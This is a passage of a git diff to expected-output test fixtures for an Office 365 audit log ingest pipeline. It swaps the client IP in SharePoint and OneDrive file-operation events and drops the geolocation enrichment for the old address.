"{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CorrelationId": "692b339f-902e-a000-f25f-95def5f17903", "CreationTime": "2020-02-07T16:44:23", "EventSource": "SharePoint", @@ -314,10 +314,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CorrelationId": "692b339f-902e-a000-f25f-95def5f17903", "CreationTime": "2020-02-07T16:44:23", "EventSource": "SharePoint", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepointfileop-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepointfileop-events.json-expected.json index 7b0ec795c0a..b6cf244dbcf 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepointfileop-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepointfileop-events.json-expected.json @@ -2,25 +2,7 @@ "expected": [ { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "url": { "original": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png" @@ -63,7 +45,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { @@ -75,12 +57,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:54.703781Z", - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"652b339f-908c-a000-f25f-91423da7dd9b\",\"CreationTime\":\"2020-02-07T16:44:07\",\"EventSource\":\"SharePoint\",\"Id\":\"ec04aa09-0a43-4879-cdc8-08d7abecf327\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"4803608a-df7d-4f63-aa73-67aa33bb576e\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png\",\"Operation\":\"FileDeleted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot 2020-01-27 at 11.30.48.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:46.865144800Z", + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"652b339f-908c-a000-f25f-91423da7dd9b\",\"CreationTime\":\"2020-02-07T16:44:07\",\"EventSource\":\"SharePoint\",\"Id\":\"ec04aa09-0a43-4879-cdc8-08d7abecf327\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"4803608a-df7d-4f63-aa73-67aa33bb576e\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png\",\"Operation\":\"FileDeleted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot 2020-01-27 at 11.30.48.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", "kind": "event", @@ -118,25 +100,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "url": { "original": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png" @@ -179,7 +143,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { @@ -191,12 +155,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:54.703788100Z", - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"652b339f-908c-a000-f25f-91423da7dd9b\",\"CreationTime\":\"2020-02-07T16:44:07\",\"EventSource\":\"SharePoint\",\"Id\":\"ec04aa09-0a43-4879-cdc8-08d7abecf327\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"4803608a-df7d-4f63-aa73-67aa33bb576e\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png\",\"Operation\":\"FileDeleted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot 2020-01-27 at 11.30.48.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:46.865153400Z", + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"652b339f-908c-a000-f25f-91423da7dd9b\",\"CreationTime\":\"2020-02-07T16:44:07\",\"EventSource\":\"SharePoint\",\"Id\":\"ec04aa09-0a43-4879-cdc8-08d7abecf327\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"4803608a-df7d-4f63-aa73-67aa33bb576e\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png\",\"Operation\":\"FileDeleted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot 2020-01-27 at 11.30.48.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", "kind": "event", @@ -234,25 +198,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "url": { "original": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx" @@ -295,7 +241,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { @@ -307,12 +253,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:54.703790100Z", - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"652b339f-90a0-a000-f25f-919afc141eb1\",\"CreationTime\":\"2020-02-07T16:44:08\",\"EventSource\":\"SharePoint\",\"Id\":\"25b08f04-48ee-4755-ce22-08d7abecf3a9\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"ff3631c1-6189-45c7-ad45-c15cea9e9255\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx\",\"Operation\":\"FileAccessed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"aspx\",\"SourceFileName\":\"All.aspx\",\"SourceRelativeUrl\":\"Documents/Forms\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:46.865159200Z", + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"652b339f-90a0-a000-f25f-919afc141eb1\",\"CreationTime\":\"2020-02-07T16:44:08\",\"EventSource\":\"SharePoint\",\"Id\":\"25b08f04-48ee-4755-ce22-08d7abecf3a9\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"ff3631c1-6189-45c7-ad45-c15cea9e9255\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx\",\"Operation\":\"FileAccessed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"aspx\",\"SourceFileName\":\"All.aspx\",\"SourceRelativeUrl\":\"Documents/Forms\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", "kind": "event", @@ -350,25 +296,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "url": { "original": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx" @@ -411,7 +339,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { @@ -423,12 +351,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:54.703792400Z", - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"652b339f-90a0-a000-f25f-919afc141eb1\",\"CreationTime\":\"2020-02-07T16:44:08\",\"EventSource\":\"SharePoint\",\"Id\":\"25b08f04-48ee-4755-ce22-08d7abecf3a9\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"ff3631c1-6189-45c7-ad45-c15cea9e9255\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx\",\"Operation\":\"FileAccessed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"aspx\",\"SourceFileName\":\"All.aspx\",\"SourceRelativeUrl\":\"Documents/Forms\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:46.865163100Z", + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"652b339f-90a0-a000-f25f-919afc141eb1\",\"CreationTime\":\"2020-02-07T16:44:08\",\"EventSource\":\"SharePoint\",\"Id\":\"25b08f04-48ee-4755-ce22-08d7abecf3a9\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"ff3631c1-6189-45c7-ad45-c15cea9e9255\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx\",\"Operation\":\"FileAccessed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"aspx\",\"SourceFileName\":\"All.aspx\",\"SourceRelativeUrl\":\"Documents/Forms\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", "kind": "event", @@ -466,25 +394,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "url": { "original": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png" @@ -528,7 +438,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { @@ -540,12 +450,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:54.703794400Z", - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"692b339f-c016-a000-f25f-990a07b2e011\",\"CreationTime\":\"2020-02-07T16:44:21\",\"EventSource\":\"SharePoint\",\"Id\":\"dac93a9f-f2fb-4cac-d18f-08d7abecfbb6\",\"ImplicitShare\":\"No\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileUploaded\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:46.865167600Z", + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-c016-a000-f25f-990a07b2e011\",\"CreationTime\":\"2020-02-07T16:44:21\",\"EventSource\":\"SharePoint\",\"Id\":\"dac93a9f-f2fb-4cac-d18f-08d7abecfbb6\",\"ImplicitShare\":\"No\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileUploaded\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", "kind": "event", @@ -583,25 +493,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "url": { "original": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png" @@ -644,7 +536,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { @@ -656,12 +548,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:54.703796200Z", - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:46.865172500Z", + "original": 